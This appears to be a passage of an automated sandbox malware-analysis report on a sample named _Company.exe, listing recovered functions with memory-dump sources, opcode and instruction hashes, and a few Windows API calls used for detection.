Instruction ID: 1e9b2c5032e7f465912e394749eec14cc02fef6c60d2f97187bd3a2f601d4c9b
Opcode Fuzzy Hash: 5a3d45b299479cac841dfc2a39e4289fb095b2fa4c104315a39a7d1b2e1572e8
Instruction Fuzzy Hash: A511FEB5C046498FCB10CF9AD949BDEFBF4EB48324F14841AE559B3210D379A544CFA5

Function 05351B38 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05351B95

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5cabe820b28b63318f8e71280798270ef303641973078274626f61ab77f29aaa
Instruction ID: 9d78874664bc3867cb331db6e6e61eee874bdfc16ddcc0f506e57d2e7a73b798
Opcode Fuzzy Hash: 5cabe820b28b63318f8e71280798270ef303641973078274626f61ab77f29aaa
Instruction Fuzzy Hash: 141112B5800249CFDB10CF9AC585BDEFBF8EB88320F20841AD959A7300D375A944CFA5

Function 010AD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646172866.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10ad000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2081d480703ea4dd08f294678a07efd534f48912567ef2aa11722a3197487014
Instruction ID: cdd5b4596589ff1242007d4d3be8a684b65c36efe6f195a74dd853ac27cd78dd
Opcode Fuzzy Hash: 2081d480703ea4dd08f294678a07efd534f48912567ef2aa11722a3197487014
Instruction Fuzzy Hash: 2C214572500204DFDB01DF84D9C0B5ABFA5FB88324F60C1ADE9490F656C73AE446CBA1

Function 011BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11bd000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc369747dc408352b50bd7f13b79cb8daef34ac8d9367f0ad893e47ca8edc959
Instruction ID: 406e98ec2a58df5c4bf27a6badf094586b2abfcb12bdd0936cd6dc7255c970f2
Opcode Fuzzy Hash: fc369747dc408352b50bd7f13b79cb8daef34ac8d9367f0ad893e47ca8edc959
Instruction Fuzzy Hash: 96212271604200DFDF1DDF58E9C0B56BB61EB88318F20C5ADE90A4B282C33AD447CA62

Function 011BD2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11bd000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8eb45419e7677cbafda44ff1ad8c4bf892c9aff67be8253878fa43cef68338
Instruction ID: 877622d7906572a6852f26707545709dc7f4bf33203b410b4a59a294f720c8b2
Opcode Fuzzy Hash: 6f8eb45419e7677cbafda44ff1ad8c4bf892c9aff67be8253878fa43cef68338
Instruction Fuzzy Hash: EC21FFB1508244DFDF0D9F54E9C0B6ABB65FB88328F24C569E8090B253C33AD446CAA2

Function 011BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11bd000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5536c8a621689a8ef5af54d6170ca443e0effdcde1947f0877e848bc5c4533
Instruction ID: f1c4d98d0d8ac6916bd9a5f1f2c25c255f5c48593b7a69e9e2d5bfadb5415a64
Opcode Fuzzy Hash: 9d5536c8a621689a8ef5af54d6170ca443e0effdcde1947f0877e848bc5c4533
Instruction Fuzzy Hash: DF2180755083809FCB06CF64D9D4B11BF71EB46218F28C5DAD8498F2A7C33A9816CB62

Function 010AD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646172866.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10ad000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: 219dc45c91ef718c954f4f0f06e98a368a02710da09b0fb8df71e9a7164e6a73
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: 3B110376404240CFDB02CF84D5C4B56BFB1FB84324F24C2A9D8490B657C33AE456CBA1

Function 011BD2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646567379.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11bd000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7446d2c010be365be41eb5dc0cb1b2bfcd5ded7fd4e3a0164d9a4b9e20566540
Instruction ID: d68d444ec356df5f5d20f040b3baf2fc4047c03daec90ab5e53a85255632d4a8
Opcode Fuzzy Hash: 7446d2c010be365be41eb5dc0cb1b2bfcd5ded7fd4e3a0164d9a4b9e20566540
Instruction Fuzzy Hash: 1B11E2B5508280CFCB0ACF14E5C0B59FF61FB84328F24C6A9D8490B653C33AD406CBA1

Non-executed Functions

Function 05350040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051dc9397a38eaa5bf1e13b6fdc5c5e62fa09eabe0756f726993d6ec79cd6e35
Instruction ID: c594296c4d898c4fbefa64e605570c5047d0cd776bfee145d6d40305655d5bed
Opcode Fuzzy Hash: 051dc9397a38eaa5bf1e13b6fdc5c5e62fa09eabe0756f726993d6ec79cd6e35
Instruction Fuzzy Hash: F01293B24217458AD730CF65E96C2893BB1BB41328B924319D2712F6E9FBB4164FEF44

Function 0128D304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886aa5509c5dd3ac6d72e93f2f6c08103a0e132a6712a6a635a602c03f4fafe4
Instruction ID: f084a368fc7692e70eded1a1050c6054cdcc468998f99952ca1e9639a276302d
Opcode Fuzzy Hash: 886aa5509c5dd3ac6d72e93f2f6c08103a0e132a6712a6a635a602c03f4fafe4
Instruction Fuzzy Hash: 7EA1B332E11216CFCF19EFB4C9445AEBBB2FF84300B25416AE901AF295DB71E916CB40

Function 0535AD60 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e829f739e66a098e754075e458b297097de3136cde59ffda451b3cb88e26e3a8
Instruction ID: 8b171ce8a0f53c6f2b1242b5f06ecf550b5d7734521b7c0105cf311e88e40b0a
Opcode Fuzzy Hash: e829f739e66a098e754075e458b297097de3136cde59ffda451b3cb88e26e3a8
Instruction Fuzzy Hash: 93819074B00258CBDB1CEB79986467EBBB7BFC8750F058529E417EB288CF3588029795

Function 05350006 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19796a514c08d616480800c640321d2c74b00439b70344886634073f8780ea2
Instruction ID: 66972476e8b0ed7c0f9e6ccdcb8aef733f96a2033adaa6f5aa4a479b3365b415
Opcode Fuzzy Hash: e19796a514c08d616480800c640321d2c74b00439b70344886634073f8780ea2
Instruction Fuzzy Hash: C4C127B28217458BD720CF25E8682893BB1BB85324F564319D1716F2E9FBB4264FEF44

Analysis Process: _Company.exePID: 7100, Parent PID: 6080COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.9%
Total number of Nodes:	215
Total number of Limit Nodes:	8

Executed Functions

Function 05569548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c3cd0c473fcc04a8b4c7a1ed6a0d19d6a9c619e55e53c0f55fb2dc361d4145
Instruction ID: c6a1296666ffc17e8dfbb916d9e4636915c3225f799d2d5f4c7fcd4a4eb56d0a
Opcode Fuzzy Hash: 81c3cd0c473fcc04a8b4c7a1ed6a0d19d6a9c619e55e53c0f55fb2dc361d4145
Instruction Fuzzy Hash: 7FF1D374E01258DFDB24DFA9C884B9DBBF2BF88304F1481A9D848AB355DB749986CF50

Function 01399DE0 Relevance: 1.1, Instructions: 1137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ea26f7d812d115eacfcd5d6743fd6343254af008484ac0eb2f5a772f82365e3
Instruction ID: 690033d06a6e3849b22d9b04e57fe960e5a04481b46b356a9ee063a52f799970
Opcode Fuzzy Hash: 9ea26f7d812d115eacfcd5d6743fd6343254af008484ac0eb2f5a772f82365e3
Instruction Fuzzy Hash: 9BA27E30A0020ADFDF15CF68C584AAEBBF6BF88318F158669E505DB3A5D735E881CB51

Function 05560B30 Relevance: .7, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c222c52163246563c6885b57fafa144fd0427b0351704966df84b4d543d2a01
Instruction ID: 6ea045772e52f179a6a44ffa505e80b82799a7734d45f27cb179131651d8b7bd
Opcode Fuzzy Hash: 0c222c52163246563c6885b57fafa144fd0427b0351704966df84b4d543d2a01
Instruction Fuzzy Hash: 1F72AB74E052698FDB64DF69C984BEDBBB2BB49300F1481E9D409A7361EB349E81CF50

Function 013969A0 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 435a36dcb6ce4619f9cd87cd92b3ff026d1c94e2c88274fad5e406b3280625bc
Instruction ID: ab82c3f471a464a46f31eb63c7295705f694b84e723cf7c0ecf4104a0dbed029
Opcode Fuzzy Hash: 435a36dcb6ce4619f9cd87cd92b3ff026d1c94e2c88274fad5e406b3280625bc
Instruction Fuzzy Hash: 5A129DB0A002198FDB15DF69C854BAEBBF6FF88304F208169E51ADB395DB349D45CB90

Function 013929EC Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dab01ae8a1f5f33c7c59a03aa15714edcf790a85ccdf89835bf1fa0305a6c75
Instruction ID: 1ec8ca043a9e4f7707112ff3a64e47a325c531e9b33fd94209cd46e335b5d7b5
Opcode Fuzzy Hash: 2dab01ae8a1f5f33c7c59a03aa15714edcf790a85ccdf89835bf1fa0305a6c75
Instruction Fuzzy Hash: 8502F431906795CFCB638F78C46425ABFF1FF4A329B2444FDC4428A622E7365892CB52

Function 01396FC8 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c2805adbbbd7eb0fa1831a3bfc8aeb481caf505418e692d6eed783ca6e6d7d4
Instruction ID: 14a19051b608534d0889f829087e61f8495f771151946a3ffbba0534ec036c51
Opcode Fuzzy Hash: 1c2805adbbbd7eb0fa1831a3bfc8aeb481caf505418e692d6eed783ca6e6d7d4
Instruction Fuzzy Hash: 44024C70A10219DFDF15CF69C884AAEBBB6BF88318F158069E945AB2A1D734DD41CF90

Function 0139F961 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aedb05b41c70384a29181986b310215d272384f8a78305402358811026b05ed
Instruction ID: 36dc33b1a64aadcbf07a4d71ca8fb330a8fbf5ca3ccd3e294c21c9613a2c9217
Opcode Fuzzy Hash: 9aedb05b41c70384a29181986b310215d272384f8a78305402358811026b05ed
Instruction Fuzzy Hash: 30C19D74E01219CFDB24DFA9C984B9DBBB6BF89304F1081A9D809AB355DB359E81CF50

Function 05562968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 700095c5a938c6ae4738e884ceab95855d3a371f0f536404236f0e71c01f62f2
Instruction ID: eda2e43c0f763aec8da4ddef806448930e31aec3cc66381fbee5289635192642
Opcode Fuzzy Hash: 700095c5a938c6ae4738e884ceab95855d3a371f0f536404236f0e71c01f62f2
Instruction Fuzzy Hash: 76C18E78E01219CFDB64DFA5C944B9DBBB2FB89304F1081A9D809AB355DB359E81CF50

Function 0139C147 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626d74711ce1f04f75e98484f3d2cf49ed009d4ce106d7fcd0dd5d61153f9c66
Instruction ID: 5b66d7ae2e7e81892559f7925509d7d1baf7be56195965f8db62c3215232dacd
Opcode Fuzzy Hash: 626d74711ce1f04f75e98484f3d2cf49ed009d4ce106d7fcd0dd5d61153f9c66
Instruction Fuzzy Hash: 68A10574E00218DFEB14DFAAD884A9DBBF2BF89314F14906AE408EB365DB359941CF51

Function 05562DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28a0b9d7e9d1cc7e7ff079f0e889f5fc99cef6c62a00999484eb6798752d409
Instruction ID: df9b8a30b970e616e9258912cd8330690e01fc4c8190846836857329cbbc2023
Opcode Fuzzy Hash: b28a0b9d7e9d1cc7e7ff079f0e889f5fc99cef6c62a00999484eb6798752d409
Instruction Fuzzy Hash: 05A11470E00209CFEB24DFA9C848BADBBB1FF88314F209269D509A7395DB759985CF54

Function 01395362 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 215ac5a80f609d07e1f16297ff51c57a1cf4deebee496b613012e6752ac98077
Instruction ID: c6d4eb525d04e54a7b3164b231f97ecbadcaa3869d13af280a9ebf2d291969c1
Opcode Fuzzy Hash: 215ac5a80f609d07e1f16297ff51c57a1cf4deebee496b613012e6752ac98077
Instruction Fuzzy Hash: 77910674E00258DFDB15CFAAD984A9DBBF2BF89304F1480AAD409EB365DB349985CF50

Function 0556310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5560000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81deff60e5642de8d632158ff71c308de68390f539ad2c3e6014f50330299c2e
Instruction ID: aef9b5370a38f1050cee1559c9b46a3c2f6d2ef12e270486ecea45e855841901
Opcode Fuzzy Hash: 81deff60e5642de8d632158ff71c308de68390f539ad2c3e6014f50330299c2e
Instruction Fuzzy Hash: 6E910474D00258CFEB20DFA8C848BEDBBB1FF49314F209669E409AB291DB759985CF14

Function 0139CA08 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05bbc6798e19f6ad32a778e302ad9fe07dbbd3fdf2942843dc2a5214df6e065a
Instruction ID: d2f6027e0c43603bbdf1fa7b63296568e96458786593e16a84bc270db317bd33
Opcode Fuzzy Hash: 05bbc6798e19f6ad32a778e302ad9fe07dbbd3fdf2942843dc2a5214df6e065a
Instruction Fuzzy Hash: 5D81C174E00218DFEF14DFAAD984A9DBBF2BF88304F149069D419AB365DB349982CF50

Function 0139D278 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60ef0501a9b51973e85df5aa853b8caa614dc9f476016595894e6628e416eea
Instruction ID: 86a3928a83bc752d64c286cdd43215ba1f6cc294a69f8d0f08236baf7650d4e1
Opcode Fuzzy Hash: b60ef0501a9b51973e85df5aa853b8caa614dc9f476016595894e6628e416eea
Instruction Fuzzy Hash: C0819074E00218DFEB14DFAAD984A9DBBF2BF88304F148069D419AB365DB35A981CF50

Function 0139CCD8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7eb117cce23b42a5fdc72e8263f282658eba708fa572907fe93bccadb8b6bdb
Instruction ID: b2f8d3224b1e656e60f6870c9651a4c5c61de5c383473345299c97a986b50f71
Opcode Fuzzy Hash: a7eb117cce23b42a5fdc72e8263f282658eba708fa572907fe93bccadb8b6bdb
Instruction Fuzzy Hash: 5281A074E00218DFEB14DFAAD984A9DBBF2BF88304F149069E409AB365DB349985CF50

Function 0139CFAC Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a455d839f1f6d36b507daf4a05f42d9286a3c84bdf2f6c01edc833ffe8336ab
Instruction ID: c0937ede5483764303364cce48d185b5612dedfd21d979cec8088a8a71cc7fb5
Opcode Fuzzy Hash: 1a455d839f1f6d36b507daf4a05f42d9286a3c84bdf2f6c01edc833ffe8336ab
Instruction Fuzzy Hash: 6C81A174E00218DFEB54DFAAD984A9DBBF2BF88314F148069E409AB365DB349981CF50

Function 0139C475 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9101dbc76df788d5a32341a310b8f4ad68648e603470bebedb9dfeb7ae84f529
Instruction ID: b21565cf159031dc0855a26e9604ad9d97c7b6acb36034812203b0322d2ce0b9
Opcode Fuzzy Hash: 9101dbc76df788d5a32341a310b8f4ad68648e603470bebedb9dfeb7ae84f529
Instruction Fuzzy Hash: AE81B274E00218DFEF14DFAAD984A9DBBF2BF88314F149069D419AB365DB34A981CF50

Function 0139C738 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a65f516fdd0375c8d3aaf4f2be5cebbdb1920917b3624a686554ccf5e66a30
Instruction ID: aef14d8532b7696dada2ab06769c60934de793cb7cec4790ee0683377f82b069
Opcode Fuzzy Hash: c5a65f516fdd0375c8d3aaf4f2be5cebbdb1920917b3624a686554ccf5e66a30
Instruction Fuzzy Hash: DD81B174E00218DFEB14DFAAD984A9DBBF2BF88314F14D06AD419AB365DB349981CF50

Function 0139E97C Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b29dfc44d5a58829b6174e56bd681d887b640ceae5e1f397608e95800ac49811
Instruction ID: 92d538899d50c95f8a462a524fd56d18906ac023d50654ec9c5ade72e6c709a0
Opcode Fuzzy Hash: b29dfc44d5a58829b6174e56bd681d887b640ceae5e1f397608e95800ac49811
Instruction Fuzzy Hash: 9751C674E01209DFEB18DFAAD884A9DBBB2FF88300F24C069E915AB365DB355841CF50

Function 0139E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04e02c5072e05c3b60a4e5b2d43b1445833e75201e87410fa7b906b7d13c631
Instruction ID: 8f800a1253d83a3d2bd47d4f98b7c8ecb7aa0d753fa04a524d840365cb02c2f3
Opcode Fuzzy Hash: c04e02c5072e05c3b60a4e5b2d43b1445833e75201e87410fa7b906b7d13c631
Instruction Fuzzy Hash: 7D51A674E01209DFEB18DFAAD584A9DBBB6FF88300F248029E919AB365DB345841CF54

Function 0139D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1390000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ecad52a6bdf27536abf713039821a08ce580daec543d68c8b9236981a8896a7
Instruction ID: 33fe266faa2b3baeeef34097b4ee888ab8be547e5d120a5108d7bbe95ab9bc7a
Opcode Fuzzy Hash: 8ecad52a6bdf27536abf713039821a08ce580daec543d68c8b9236981a8896a7
Instruction Fuzzy Hash: D2517274E01218DFDB58DFAAD98499DBBF2FF89310F248169E409AB364DB31A905CF50

Function 010A4C28 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010A4E86

Memory Dump Source

Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10a0000__Company.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f6f2414b0310f28c29ef1d79cb641d9401056b8af1ae42c39fba6cb6e777da29
Instruction ID: b66d2e3aaf7eb6197566e0340e32c48c57a66e1f8a07a5cc6d570fa55588615c
Opcode Fuzzy Hash: f6f2414b0310f28c29ef1d79cb641d9401056b8af1ae42c39fba6cb6e777da29
Instruction Fuzzy Hash: BD818774A00B058FE764DF6AD44079ABBF1FF88300F04896DD58ADBA50DBB5E845CB90

Function 010A6E04 Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 010A6F22

Memory Dump Source

Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10a0000__Company.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 132f08e8a45684fb3642254ba79f6dd9b47e87d04cccf8571c9ec1039d7904ea
Instruction ID: 5dd996ff12dcb886c99f44597030704e5387d1956158c35ef420c3b6f9ab23d3
Opcode Fuzzy Hash: 132f08e8a45684fb3642254ba79f6dd9b47e87d04cccf8571c9ec1039d7904ea
Instruction Fuzzy Hash: 5051CEB1D103499FDB14CFAAC880ADEBBF5FF48314F64852AE919AB210D7759881CF90

Function 010A42CC Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 010A6F22

Memory Dump Source

Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10a0000__Company.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 17dcd3a4826122b0d2ab45023a76bb9a0337e475d2a9a31581a01954f46e7cdd
Instruction ID: 9f03f4c69bec20e30c54673ef1ad05e40f4629831f278598318515bec1e5de51
Opcode Fuzzy Hash: 17dcd3a4826122b0d2ab45023a76bb9a0337e475d2a9a31581a01954f46e7cdd
Instruction Fuzzy Hash: 7F51CEB1D003499FDB14CF9AC884ADEBBF6FF48310F64852AE919AB250D775A845CF90

Function 010A441C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 010A9621

Memory Dump Source

Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10a0000__Company.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 548e32ca6ff28599a2c784d7d9d00d9fc1881de42ad3459dd319d710c03af84a
Instruction ID: 8b4de2526941183c55d3e5d904b21cadd550702beec0e1d275c18aad70732de7
Opcode Fuzzy Hash: 548e32ca6ff28599a2c784d7d9d00d9fc1881de42ad3459dd319d710c03af84a
Instruction Fuzzy Hash: 46412CB4A00209CFDB14CF99C488AAEBBF5FF88314F24C459E559AB321D775A841CFA4

